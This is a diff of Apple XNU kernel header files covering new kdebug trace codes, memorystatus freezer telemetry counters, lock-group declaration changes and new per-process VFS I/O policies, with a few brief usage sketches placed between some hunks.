index 1320d65be615406028bc24d7515de1ca93d34732..e11b773cbef91fa24ae4093deda0861394367392 100644 (file)
@@ -40,7 +40,6 @@ extern int
 kern_asl_msg(int level, const char *facility, size_t num_pairs, ...);
 
 extern int escape_str(char *str, size_t len, size_t buflen);
-extern void fpxlog_init(void);
 extern void fpxlog(int, uint32_t, uint32_t, uint32_t);
 
 #endif /* !_SYS_KASL_H_ */
index 66cb12e92cc0026cd552c193e2c763f4b78e9d9d..3c6cd105cc77a2013df607236eaebdcb61729eb2 100644 (file)
@@ -782,15 +782,19 @@ void kprintf(const char *fmt, ...);
 /*
  * Initialisation.
  */
-extern lck_grp_t *kauth_lck_grp;
 #ifdef XNU_KERNEL_PRIVATE
 __BEGIN_DECLS
+
+extern lck_grp_t kauth_lck_grp;
+
 extern void     kauth_init(void);
 extern void     kauth_cred_init(void);
+/*
+ * If you need accounting for KM_KAUTH, consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_KAUTH     KHEAP_DEFAULT
 #if CONFIG_EXT_RESOLVER
-extern void     kauth_identity_init(void);
-extern void     kauth_groups_init(void);
-extern void     kauth_resolver_init(void);
 extern void     kauth_resolver_identity_reset(void);
 #endif
 __END_DECLS
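A hedged sketch of the accounting suggestion above, assuming the KALLOC_HEAP_DEFINE macro and KHEAP_ID_DEFAULT from kern/kalloc.h; the view name KHEAP_KAUTH is illustrative:

    /* Define a named view of the default heap so kauth allocations are accounted separately. */
    KALLOC_HEAP_DEFINE(KHEAP_KAUTH, "kauth", KHEAP_ID_DEFAULT);
    #define KM_KAUTH KHEAP_KAUTH   /* instead of aliasing KHEAP_DEFAULT directly */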
index f458713539e84bee2cb9a49367f2aadef26e6fde..3fbe03b94c98a706b57ce9e5ad56f388112b58b5 100644 (file)
@@ -182,6 +182,7 @@ __BEGIN_DECLS
 #define DBG_MACH_SCHED_CLUTCH   0xA9 /* Clutch scheduler */
 #define DBG_MACH_IO             0xAA /* I/O */
 #define DBG_MACH_WORKGROUP      0xAB /* Workgroup subsystem */
+#define DBG_MACH_HV             0xAC /* Hypervisor subsystem */
 
 /* Codes for DBG_MACH_IO */
 #define DBC_MACH_IO_MMIO_READ           0x1
@@ -260,6 +261,8 @@ __BEGIN_DECLS
 #define MACH_TURNSTILE_KERNEL_CHANGE 0x40 /* sched priority change because of turnstile */
 #define MACH_SCHED_WI_AUTO_JOIN      0x41 /* work interval auto join events */
 #define MACH_SCHED_WI_DEFERRED_FINISH 0x42 /* work interval pending finish events for auto-join thread groups */
+#define MACH_SET_RT_DEADLINE       0x43 /* set thread->realtime.deadline */
+#define MACH_CANCEL_RT_DEADLINE    0x44 /* cancel thread->realtime.deadline */
 #define MACH_PSET_AVG_EXEC_TIME    0x50
 
 /* Codes for Clutch/Edge Scheduler (DBG_MACH_SCHED_CLUTCH) */
@@ -360,6 +363,13 @@ __BEGIN_DECLS
 #define PMAP__UPDATE_CACHING    0x15
 #define PMAP__ATTRIBUTE_CLEAR_RANGE 0x16
 #define PMAP__CLEAR_USER_TTB    0x17
+#define PMAP__IOMMU_INIT        0x18
+#define PMAP__IOMMU_IOVMALLOC   0x19
+#define PMAP__IOMMU_IOVMFREE    0x1a
+#define PMAP__IOMMU_MAP         0x1b
+#define PMAP__IOMMU_UNMAP       0x1c
+#define PMAP__IOMMU_IOCTL       0x1d
+#define PMAP__IOMMU_GRANT_PAGE  0x1e
 
 /* Codes for clock (DBG_MACH_CLOCK) */
 #define MACH_EPOCH_CHANGE       0x0     /* wake epoch change */
@@ -420,6 +430,10 @@ __BEGIN_DECLS
 #define RMON_LOGWRITES_VIOLATED_K32B    0x025
 #define RMON_DISABLE_IO_MONITOR         0x02f
 
+/* Codes for Hypervisor (DBG_MACH_HV) */
+#define HV_GUEST_ENTER                  0x000
+#define HV_GUEST_ERROR                  0x001
+
 /* **** The Kernel Debug Sub Classes for Network (DBG_NETWORK) **** */
 #define DBG_NETIP       1       /* Internet Protocol */
 #define DBG_NETARP      2       /* Address Resolution Protocol */
@@ -570,6 +584,11 @@ __BEGIN_DECLS
 #define DBG_HFS_UPDATE_MINOR     0x40
 #define DBG_HFS_UPDATE_SKIPPED   0x80
 
+/*
+ * Codes for Kernel Debug Sub Class DBG_VFS
+ */
+#define DBG_VFS_IO_COMPRESSION_STATS 0x1000
+
 /* The Kernel Debug Sub Classes for BSD */
 #define DBG_BSD_PROC              0x01 /* process/signals related */
 #define DBG_BSD_MEMSTAT           0x02 /* memorystatus / jetsam operations */
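A hedged sketch of emitting the new DBG_MACH_HV codes; KDBG_RELEASE and MACHDBG_CODE are assumed from the kernel-private kdebug headers, and vcpu_id is illustrative:

    KDBG_RELEASE(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_START, vcpu_id);
    /* ... enter and run the guest ... */
    KDBG_RELEASE(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id);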
index 4cbfd6b8f0c4ccae1e95c7428e868a146df620e6..8db45d65e0a24a57d06da0113b2bce73b5cc830d 100644 (file)
@@ -364,7 +364,7 @@ int memorystatus_control(uint32_t command, int32_t pid, uint32_t flags, void *bu
 #define MEMORYSTATUS_CMD_INCREASE_JETSAM_TASK_LIMIT   22   /* Used by DYLD to increase the jetsam active and inactive limits, when using roots */
 
 #if PRIVATE
-#define MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP 23 /* Used by unit tests in the development kernel only. */
+#define MEMORYSTATUS_CMD_SET_TESTING_PID 23 /* Used by unit tests in the development kernel only. */
 #endif /* PRIVATE */
 
 #define MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN 24 /* Check if the process is frozen. */
@@ -402,8 +402,8 @@ typedef struct memorystatus_jetsam_panic_options {
 #define MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY          0x10    /* Set probability of use for a group of processes */
 
 #if PRIVATE
-#define MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP      0x20 /* Only used by xnu unit tests. */
-#define MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP      0x40 /* Only used by xnu unit tests. */
+#define MEMORYSTATUS_FLAGS_SET_TESTING_PID     0x20 /* Only used by xnu unit tests. */
+#define MEMORYSTATUS_FLAGS_UNSET_TESTING_PID   0x40 /* Only used by xnu unit tests. */
 #endif /* PRIVATE */
 
 #define MEMORYSTATUS_FLAGS_SNAPSHOT_FREEZER             0x80    /* A snapshot buffer containing app kills since last consumption */
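A hedged sketch of how a development-kernel unit test might use the renamed command and flags through memorystatus_control(), whose prototype appears earlier in this header:

    #include <unistd.h>

    /* Claim testing-pid status for this test process ... */
    int err = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, getpid(),
        MEMORYSTATUS_FLAGS_SET_TESTING_PID, NULL, 0);

    /* ... and drop it when the test finishes. */
    err = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, getpid(),
        MEMORYSTATUS_FLAGS_UNSET_TESTING_PID, NULL, 0);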
index dd01e09ce8f2efd2e6049fc3477bcd645b024cf1..c962d09490cbc3ac95d7616703cb453638840312 100644 (file)
@@ -58,6 +58,7 @@ extern unsigned int memorystatus_freeze_private_shared_pages_ratio; /* Ratio of
 extern unsigned int memorystatus_suspended_count;
 extern unsigned int memorystatus_thaw_count; /* # of processes that have been thawed in the current interval. */
 extern unsigned int memorystatus_refreeze_eligible_count; /* # of processes currently thawed i.e. have state on disk & in-memory */
+extern uint32_t memorystatus_freeze_current_interval; /* Monotonically increasing interval id. */
 
 void memorystatus_freeze_init(void);
 extern int  memorystatus_freeze_process_sync(proc_t p);
@@ -115,6 +116,67 @@ int memorystatus_freezer_control(int32_t flags, user_addr_t buffer, size_t buffe
 void memorystatus_freeze_init_proc(proc_t p);
 errno_t memorystatus_get_process_is_frozen(pid_t pid, int *is_freezable);
 
+/* Freezer counters collected for telemetry */
+struct memorystatus_freezer_stats_t {
+       /*
+        * # of processes that we've considered freezing.
+        * Used to normalize the error reasons below.
+        */
+       uint64_t mfs_process_considered_count;
+
+       /*
+        * The following counters track how many times we've failed to freeze
+        * a process because of a specific FREEZER_ERROR.
+        */
+       /* EXCESS_SHARED_MEMORY */
+       uint64_t mfs_error_excess_shared_memory_count;
+       /* LOW_PRIVATE_SHARED_RATIO */
+       uint64_t mfs_error_low_private_shared_ratio_count;
+       /* NO_COMPRESSOR_SPACE */
+       uint64_t mfs_error_no_compressor_space_count;
+       /* NO_SWAP_SPACE */
+       uint64_t mfs_error_no_swap_space_count;
+       /* pages < memorystatus_freeze_pages_min */
+       uint64_t mfs_error_below_min_pages_count;
+       /* dasd determined it was unlikely to be relaunched. */
+       uint64_t mfs_error_low_probability_of_use_count;
+       /* transient reasons (like inability to acquire a lock). */
+       uint64_t mfs_error_other_count;
+
+       /*
+        * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold.
+        * Used to normalize skipped_full_count and shared_mb_high_count.
+        */
+       uint64_t mfs_below_threshold_count;
+
+       /* Skipped running the freezer because we were out of slots */
+       uint64_t mfs_skipped_full_count;
+
+       /* Skipped running the freezer because we were over the shared mb limit */
+       uint64_t mfs_skipped_shared_mb_high_count;
+
+       /*
+        * How many pages have not been sent to swap because they were in a shared object?
+        * This is being used to gather telemetry so we can understand the impact we'd have
+        * on our NAND budget if we did swap out these pages.
+        */
+       uint64_t mfs_shared_pages_skipped;
+
+       /*
+        * A running sum of the total number of bytes sent to NAND during
+        * refreeze operations since boot.
+        */
+       uint64_t mfs_bytes_refrozen;
+       /* The number of refreeze operations since boot */
+       uint64_t mfs_refreeze_count;
+
+       /* The number of processes which have been frozen at least once in the current interval. */
+       uint64_t mfs_processes_frozen;
+       /* The number of processes which have been thawed at least once in the current interval. */
+       uint64_t mfs_processes_thawed;
+};
+extern struct memorystatus_freezer_stats_t memorystatus_freezer_stats;
+
 #endif /* CONFIG_FREEZE */
 
 #endif /* XNU_KERNEL_PRIVATE */
index 574ef7a706ddcecd7e037736cad775956322f7c6..8dc82f3132429b8bfc89703d5ff7c1a72e13cad2 100644 (file)
 struct vnop_advlock_args;
 struct vnode;
 
-#ifdef MALLOC_DECLARE
-MALLOC_DECLARE(M_LOCKF);
-#endif
-
 #if IMPORTANCE_INHERITANCE
 #define LF_NOT_BOOSTED  0
 #define LF_BOOSTED      1
index 4bf21625fc0e958af9b38a5dd301ec7fdd9254a0..62c2a4085f15e2999af5d3a4b2fe49c57b4fc59c 100644 (file)
@@ -144,6 +144,12 @@ ZONE_VIEW_DECLARE(ZV_NAMEI);
 
 #define M_LAST          129     /* Must be last type + 1 */
 
+/*
+ * If you need accounting, consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_SHM          KHEAP_DEFAULT
+
 #define MALLOC(space, cast, size, type, flags)                      \
        ({ VM_ALLOC_SITE_STATIC(0, 0);                              \
        (space) = (cast)__MALLOC(size, type, flags, &site); })
index 0e8be447e685946c3d8ba9eaf8a14991564d841a..802e54672ac25eb68b7f1e06ab33a4ab8fb8fec3 100644 (file)
@@ -694,6 +694,9 @@ struct mbuf {
 /* checksum start adjustment has been done */
 #define CSUM_ADJUST_DONE        0x00020000
 
+/* VLAN encapsulation present */
+#define CSUM_VLAN_ENCAP_PRESENT    0x00040000      /* mbuf has vlan encapsulation */
+
 /* TCP Segment Offloading requested on this mbuf */
 #define CSUM_TSO_IPV4           0x00100000      /* This mbuf needs to be segmented by the NIC */
 #define CSUM_TSO_IPV6           0x00200000      /* This mbuf needs to be segmented by the NIC */
@@ -1079,6 +1082,7 @@ struct mbstat {
        u_int32_t       m_bigclusters;  /* clusters obtained from page pool */
        u_int32_t       m_bigclfree;    /* free clusters */
        u_int32_t       m_bigmclbytes;  /* length of an mbuf cluster */
+       u_int32_t       m_forcedefunct; /* times we force defunct'ed an app's sockets */
 };
 
 /* Compatibility with 10.3 */
index 243965bd73810ae23d4301ba69cfc6f8715bedd5..4fd209c376f90b695f6dd2349ee61aadbda04f2e 100644 (file)
@@ -306,23 +306,17 @@ typedef struct mcache {
        u_int32_t       mc_nwretry_cnt; /* # of no-wait retry attempts */
        u_int32_t       mc_nwfail_cnt;  /* # of no-wait retries that failed */
        decl_lck_mtx_data(, mc_sync_lock); /* protects purges and reenables */
-       lck_attr_t      *mc_sync_lock_attr;
        lck_grp_t       *mc_sync_lock_grp;
-       lck_grp_attr_t  *mc_sync_lock_grp_attr;
        /*
         * Keep CPU and buckets layers lock statistics separate.
         */
-       lck_attr_t      *mc_cpu_lock_attr;
        lck_grp_t       *mc_cpu_lock_grp;
-       lck_grp_attr_t  *mc_cpu_lock_grp_attr;
 
        /*
         * Bucket layer common to all CPUs
         */
        decl_lck_mtx_data(, mc_bkt_lock);
-       lck_attr_t      *mc_bkt_lock_attr;
        lck_grp_t       *mc_bkt_lock_grp;
-       lck_grp_attr_t  *mc_bkt_lock_grp_attr;
        mcache_bkttype_t *cache_bkttype;        /* bucket type */
        mcache_bktlist_t mc_full;               /* full buckets */
        mcache_bktlist_t mc_empty;              /* empty buckets */
@@ -357,6 +351,8 @@ typedef struct mcache {
 
 #define MCA_TRN_MAX     2               /* Number of transactions to record */
 
+#define DUMP_MCA_BUF_SIZE       512
+
 typedef struct mcache_audit {
        struct mcache_audit *mca_next;  /* next audit struct */
        void            *mca_addr;      /* address of buffer */
@@ -404,7 +400,7 @@ __private_extern__ void mcache_audit_free_verify(mcache_audit_t *,
     void *, size_t, size_t);
 __private_extern__ void mcache_audit_free_verify_set(mcache_audit_t *,
     void *, size_t, size_t);
-__private_extern__ char *mcache_dump_mca(mcache_audit_t *);
+__private_extern__ char *mcache_dump_mca(char buf[DUMP_MCA_BUF_SIZE], mcache_audit_t *);
 __private_extern__ void mcache_audit_panic(mcache_audit_t *, void *, size_t,
     int64_t, int64_t) __abortlike;
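With the new signature the caller owns the output buffer; a minimal sketch, where mca is an illustrative mcache_audit_t *:

    char buf[DUMP_MCA_BUF_SIZE];
    printf("%s\n", mcache_dump_mca(buf, mca));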
 
index a6e093f59fdde9caef51063f6543e946641727e3..4ec0f06f3c14f66aa59ffd1ca085b1d39712ce70 100644 (file)
@@ -288,7 +288,6 @@ __END_DECLS
 #else   /* KERNEL */
 #ifdef XNU_KERNEL_PRIVATE
 void pshm_cache_init(void);     /* for bsd_init() */
-void pshm_lock_init(void);
 
 /*
  * XXX routine exported by posix_shm.c, but never used there, only used in
index 6ec648972d27b70dba500497c332bbae29b11bf5..bbf76690404f3e182b016e8cd7f9730e22d76663 100644 (file)
@@ -176,7 +176,7 @@ __BEGIN_DECLS
 #define MT_KDBG_TMPTH_START(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_START)
 #define MT_KDBG_TMPTH_END(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_END)
 
-extern lck_grp_t mt_lock_grp;
+extern lck_grp_t mt_lock_grp;
 
 int mt_dev_init(void);
 
index 6ff9616b358b5350916d3739a0f4fbaa9e0f91cf..f9b9a1480a364bfebb5f9bd8b7ab103b58e5110d 100644 (file)
@@ -1334,6 +1334,7 @@ void *  vfs_mntlabel(mount_t mp); /* Safe to cast to "struct label*"; returns "v
 void    vfs_setcompoundopen(mount_t mp);
 uint64_t vfs_throttle_mask(mount_t mp);
 int vfs_isswapmount(mount_t mp);
+int     vfs_context_dataless_materialization_is_prevented(vfs_context_t);
 boolean_t vfs_context_is_dataless_manipulator(vfs_context_t);
 boolean_t vfs_context_can_resolve_triggers(vfs_context_t);
 void    vfs_setmntsystem(mount_t mp);
index 2af3a1283cf4da20d8a6cdda50fc93a4553651d0..f3f0526a455ea92843c024b547fdda3d15e29993 100644 (file)
@@ -474,7 +474,7 @@ typedef uint32_t vfs_switch_root_flags_t;
 int vfs_switch_root(const char *, const char *, vfs_switch_root_flags_t);
 
 int     vfs_mountroot(void);
-void    vfs_unmountall(void);
+void    vfs_unmountall(int only_non_system);
 int     safedounmount(struct mount *, int, vfs_context_t);
 int     dounmount(struct mount *, int, int, vfs_context_t);
 void    dounmount_submounts(struct mount *, int, vfs_context_t);
@@ -502,6 +502,7 @@ void mount_iterreset(mount_t);
 #define KERNEL_MOUNT_PREBOOTVOL         0x20 /* mount the Preboot volume */
 #define KERNEL_MOUNT_RECOVERYVOL        0x40 /* mount the Recovery volume */
 #define KERNEL_MOUNT_BASESYSTEMROOT     0x80 /* mount a base root volume "instead of" the full root volume (only used during bsd_init) */
+#define KERNEL_MOUNT_DEVFS             0x100 /* kernel startup mount of devfs */
 
 /* mask for checking if any of the "mount volume by role" flags are set */
 #define KERNEL_MOUNT_VOLBYROLE_MASK (KERNEL_MOUNT_DATAVOL | KERNEL_MOUNT_VMVOL | KERNEL_MOUNT_PREBOOTVOL | KERNEL_MOUNT_RECOVERYVOL)
@@ -529,8 +530,6 @@ void rethrottle_thread(uthread_t ut);
 extern int num_trailing_0(uint64_t n);
 
 /* sync lock */
-extern lck_mtx_t * sync_mtx_lck;
-
 extern int sync_timeout_seconds;
 
 extern zone_t mount_zone;
index 43c30b05fe41901a4d26046df0c2adcfb5af6274..f714a61d9f00c71dd06704bd0da22f98aad5c91e 100644 (file)
@@ -169,6 +169,7 @@ void munge_wws(void *args);
 void munge_wwws(void *args);
 void munge_wwwsw(void *args);
 void munge_llllll(void *args);
+void munge_llll(void *args);
 void munge_l(void *args);
 void munge_ll(void *args);
 void munge_lw(void *args);
index 34c019cef334adfebf887dc027e0ac3586557b4e..dadd3349d4dc5c5cccfa7b1c7845c51216907e2e 100644 (file)
 #include <mach/coalition.h>             /* COALITION_NUM_TYPES */
 #endif
 
+#ifndef KERNEL
+#include <Availability.h>
+#endif
+
 #if defined(XNU_KERNEL_PRIVATE) || !defined(KERNEL)
 
 struct session;
@@ -410,6 +414,9 @@ extern boolean_t proc_is_translated(proc_t);
 /* true if the process ignores errors from content protection APIs */
 extern bool proc_ignores_content_protection(proc_t proc);
 
+/* true if the file system shouldn't update mtime for operations by the process */
+extern bool proc_skip_mtime_update(proc_t proc);
+
 /*!
  *  @function    proc_exitstatus
  *  @abstract    KPI to determine a process's exit status.
@@ -498,8 +505,10 @@ __BEGIN_DECLS
 
 int pid_suspend(int pid);
 int pid_resume(int pid);
-int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t);
-int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t);
+__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3))
+int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t);  /* Returns task inspect port */
+__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3))
+int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t);     /* Returns task read port */
 
 #if defined(__arm__) || defined(__arm64__)
 int pid_hibernate(int pid);
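A hedged user-space sketch of the newly annotated entry points; availability follows the __API_AVAILABLE markers above, and targeting the caller's own pid is only for illustration:

    #include <mach/mach.h>
    #include <unistd.h>

    unsigned int read_port = 0;
    if (task_read_for_pid(mach_task_self(), getpid(), &read_port) == 0) {
            /* read_port now holds a read-only task port for the target */
    }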
index 46a610413bc22b524a858e485fdf6d242673727c..4c6ceb04c76eb4550e5b3ae488f84101b0e4e088 100644 (file)
@@ -404,6 +404,7 @@ struct  proc {
        uint32_t          p_memstat_freeze_sharedanon_pages; /* shared pages left behind after freeze */
        uint32_t          p_memstat_frozen_count;
        uint32_t          p_memstat_thaw_count;
+       uint32_t          p_memstat_last_thaw_interval; /* In which freezer interval was this last thawed? */
 #endif /* CONFIG_FREEZE */
 #endif /* CONFIG_MEMORYSTATUS */
 
@@ -526,7 +527,10 @@ struct proc_ident {
 #define P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME            0x0008
 #define P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE          0x0010
 #define P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION        0x0020
-#define P_VFS_IOPOLICY_VALID_MASK                       (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION)
+#define P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS          0x0040
+#define P_VFS_IOPOLICY_SKIP_MTIME_UPDATE                                0x0080
+#define P_VFS_IOPOLICY_VALID_MASK                       (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | \
+               P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION | P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS | P_VFS_IOPOLICY_SKIP_MTIME_UPDATE)
 
 /* process creation arguments */
 #define PROC_CREATE_FORK        0       /* independent child (running) */
@@ -690,8 +694,7 @@ extern unsigned int proc_shutdown_exitcount;
 
 #define PID_MAX         99999
 #define NO_PID          100000
-extern lck_mtx_t * proc_list_mlock;
-extern lck_mtx_t * proc_klist_mlock;
+extern lck_mtx_t proc_list_mlock;
 
 #define BSD_SIMUL_EXECS         33 /* 32 , allow for rounding */
 #define BSD_PAGEABLE_SIZE_PER_EXEC      (NCARGS + PAGE_SIZE + PAGE_SIZE) /* page for apple vars, page for executable header */
@@ -712,16 +715,15 @@ extern u_long pgrphash;
 extern LIST_HEAD(sesshashhead, session) * sesshashtbl;
 extern u_long sesshash;
 
-extern lck_grp_t * proc_lck_grp;
-extern lck_grp_t * proc_fdmlock_grp;
-extern lck_grp_t * proc_kqhashlock_grp;
-extern lck_grp_t * proc_knhashlock_grp;
-extern lck_grp_t * proc_mlock_grp;
-extern lck_grp_t * proc_ucred_mlock_grp;
-extern lck_grp_t * proc_slock_grp;
-extern lck_grp_t * proc_dirslock_grp;
-extern lck_grp_attr_t * proc_lck_grp_attr;
-extern lck_attr_t * proc_lck_attr;
+extern lck_attr_t proc_lck_attr;
+extern lck_grp_t proc_fdmlock_grp;
+extern lck_grp_t proc_lck_grp;
+extern lck_grp_t proc_kqhashlock_grp;
+extern lck_grp_t proc_knhashlock_grp;
+extern lck_grp_t proc_slock_grp;
+extern lck_grp_t proc_mlock_grp;
+extern lck_grp_t proc_ucred_mlock_grp;
+extern lck_grp_t proc_dirslock_grp;
 
 LIST_HEAD(proclist, proc);
 extern struct proclist allproc;         /* List of all processes. */
@@ -920,4 +922,10 @@ extern zone_t proc_sigacts_zone;
 
 extern struct proc_ident proc_ident(proc_t p);
 
+/*
+ * True if the process ignores file permissions when it owns the
+ * file/directory.
+ */
+bool proc_ignores_node_permissions(proc_t proc);
+
 #endif  /* !_SYS_PROC_INTERNAL_H_ */
index e956225b2e6350c11acea025595d2eaae722c9d8..1d28e90f95a6e7b69d052fb836e4883e1fc4da63 100644 (file)
@@ -202,7 +202,7 @@ typedef const struct pthread_callbacks_s {
 
        /* osfmk/vm/vm_map.h */
        kern_return_t (*vm_map_page_info)(vm_map_t map, vm_map_offset_t offset, vm_page_info_flavor_t flavor, vm_page_info_t info, mach_msg_type_number_t *count);
-       void *__unused_was_vm_map_switch;
+       mach_port_name_t (*ipc_port_copyout_send_pinned)(ipc_port_t sright, ipc_space_t space);
 
        /* wq functions */
        kern_return_t (*thread_set_wq_state32)(thread_t thread, thread_state_t state);
@@ -291,14 +291,14 @@ typedef const struct pthread_callbacks_s {
        uint16_t (*thread_set_tag)(thread_t thread, uint16_t tag);
        uint16_t (*thread_get_tag)(thread_t thread);
 
-       void *__unused_was_proc_usynch_thread_qos_squash_override_for_resource;
-       void *__unused_was_task_get_default_manager_qos;
-       void *__unused_was_thread_create_workq_waiting;
+       kern_return_t (*thread_create_pinned)(task_t parent_task, thread_t *new_thread);
+       kern_return_t (*thread_terminate_pinned)(thread_t thread);
+       ipc_port_t (*convert_thread_to_port_pinned)(thread_t th);
 
        user_addr_t (*proc_get_stack_addr_hint)(struct proc *p);
        void (*proc_set_stack_addr_hint)(struct proc *p, user_addr_t stack_addr_hint);
 
-       void *__unused_was_proc_get_return_to_kernel_offset;
+       kern_return_t (*thread_create_immovable)(task_t parent_task, thread_t *new_thread);
        void (*proc_set_return_to_kernel_offset)(struct proc *t, uint64_t offset);
 
        void *__unused_was_workloop_fulfill_threadreq;
index 08fcfd7acd51d71545db407cfa6193183f9d228b..cecc86d70739a823dce44dcd927ba98c4a0e7946 100644 (file)
@@ -353,7 +353,6 @@ void    dqfileclose(struct quotafile *, int);
 void    dqflush(struct vnode *);
 int     dqget(u_int32_t, struct quotafile *, int, struct dquot **);
 void    dqhashinit(void);
-void    dqinit(void);
 int     dqisinitialized(void);
 void    dqref(struct dquot *);
 void    dqrele(struct dquot *);
index b3baf8421439ca1f3b882063c46e8639ccd79b9b..e3b86028ae078a5c3f21f9ab0d897e574f5b5e4c 100644 (file)
@@ -547,6 +547,8 @@ struct proc_rlimit_control_wakeupmon {
 #define IOPOL_TYPE_VFS_STATFS_NO_DATA_VOLUME 4
 #define IOPOL_TYPE_VFS_TRIGGER_RESOLVE 5
 #define IOPOL_TYPE_VFS_IGNORE_CONTENT_PROTECTION 6
+#define IOPOL_TYPE_VFS_IGNORE_PERMISSIONS 7
+#define IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE 8
 
 /* scope */
 #define IOPOL_SCOPE_PROCESS   0
@@ -586,6 +588,12 @@ struct proc_rlimit_control_wakeupmon {
 #define IOPOL_VFS_CONTENT_PROTECTION_DEFAULT 0
 #define IOPOL_VFS_CONTENT_PROTECTION_IGNORE  1
 
+#define IOPOL_VFS_IGNORE_PERMISSIONS_OFF 0
+#define IOPOL_VFS_IGNORE_PERMISSIONS_ON  1
+
+#define IOPOL_VFS_SKIP_MTIME_UPDATE_OFF 0
+#define IOPOL_VFS_SKIP_MTIME_UPDATE_ON 1
+
 #ifdef PRIVATE
 /*
  * Structures for use in communicating via iopolicysys() between Libc and the
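A hedged user-space sketch of enabling the new mtime-skipping policy for the current process via setiopolicy_np(3):

    #include <sys/resource.h>

    if (setiopolicy_np(IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE, IOPOL_SCOPE_PROCESS,
            IOPOL_VFS_SKIP_MTIME_UPDATE_ON) != 0) {
            /* inspect errno */
    }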
index a86f6f7654ef4da4016a596ba75d72e964e3e25d..2c3544bf8b6b886b39acc03f5577591bb7e5ca3a 100644 (file)
@@ -74,12 +74,6 @@ int              sbuf_done(struct sbuf *);
 void             sbuf_delete(struct sbuf *);
 #endif
 
-#ifdef KERNEL
-struct uio;
-struct sbuf     *sbuf_uionew(struct sbuf *, struct uio *, int *);
-int              sbuf_bcopyin(struct sbuf *, const void *, size_t);
-int              sbuf_copyin(struct sbuf *, const void *, size_t);
-#endif
 __END_DECLS
 
 #endif
index 2fb516833d8e02496ac847799a2cdf8a9bc8e9dc..27ad0c3c2dab1336031bbdb84c9fab03fa183939 100644 (file)
@@ -139,6 +139,10 @@ extern int selwait;
 void    selrecord(proc_t selector, struct selinfo *, void *);
 void    selwakeup(struct selinfo *);
 void    selthreadclear(struct selinfo *);
+#if XNU_KERNEL_PRIVATE
+struct _select;
+void    select_cleanup_uthread(struct _select *);
+#endif
 
 __END_DECLS
 
index b55852012d785179a378a4daf4a919e40cba9cac..7dc1085fd450e223da38b6647c43c42e53927c21 100644 (file)
@@ -62,7 +62,6 @@ int sem_wait(sem_t *) __DARWIN_ALIAS_C(sem_wait);
 __END_DECLS
 
 #else   /* KERNEL */
-void psem_lock_init(void);
 void psem_cache_init(void);
 #endif  /* KERNEL */
 
index c5124169af796285887e7b1ba8f11e42de35d67e..c1e66418741fdd9561eca1ff95da397d70f861fe 100644 (file)
@@ -85,6 +85,9 @@
 #include <sys/eventhandler.h>
 #endif /* BSD_KERNEL_PRIVATE */
 #endif /* KERNEL_PRIVATE */
+#if !KERNEL
+#include <TargetConditionals.h>
+#endif
 
 typedef u_quad_t so_gen_t;
 
@@ -433,7 +436,7 @@ struct  xsocket {
        uid_t                   so_uid;         /* XXX */
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 struct  xsocket64 {
        u_int32_t               xso_len;        /* length of this structure */
        u_int64_t               xso_so;         /* makes a convenient handle */
@@ -455,7 +458,7 @@ struct  xsocket64 {
        struct xsockbuf         so_snd;
        uid_t                   so_uid;         /* XXX */
 };
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #ifdef PRIVATE
 #define XSO_SOCKET      0x001
index 74a04166baa665bb3624086b7684897f6245a9bf..c686d328aeaba3eddb62bf889d7f13cc7a2441e2 100644 (file)
 #include <sys/time.h>
 #include <sys/ucred.h>
 #else
-#ifndef XNU_KERNEL_PRIVATE
+#ifdef XNU_KERNEL_PRIVATE
+#include <kern/startup.h>
+#include <libkern/section_keywords.h>
+#else
 #include <libkern/sysctl.h>
 #include <os/base.h>
-#endif
+#endif /* XNU_KERNEL_PRIVATE */
+#endif /* KERNEL */
 
-#endif
 #include <sys/proc.h>
 #include <sys/vm.h>
 
-#ifdef XNU_KERNEL_PRIVATE
-#include <sys/linker_set.h>
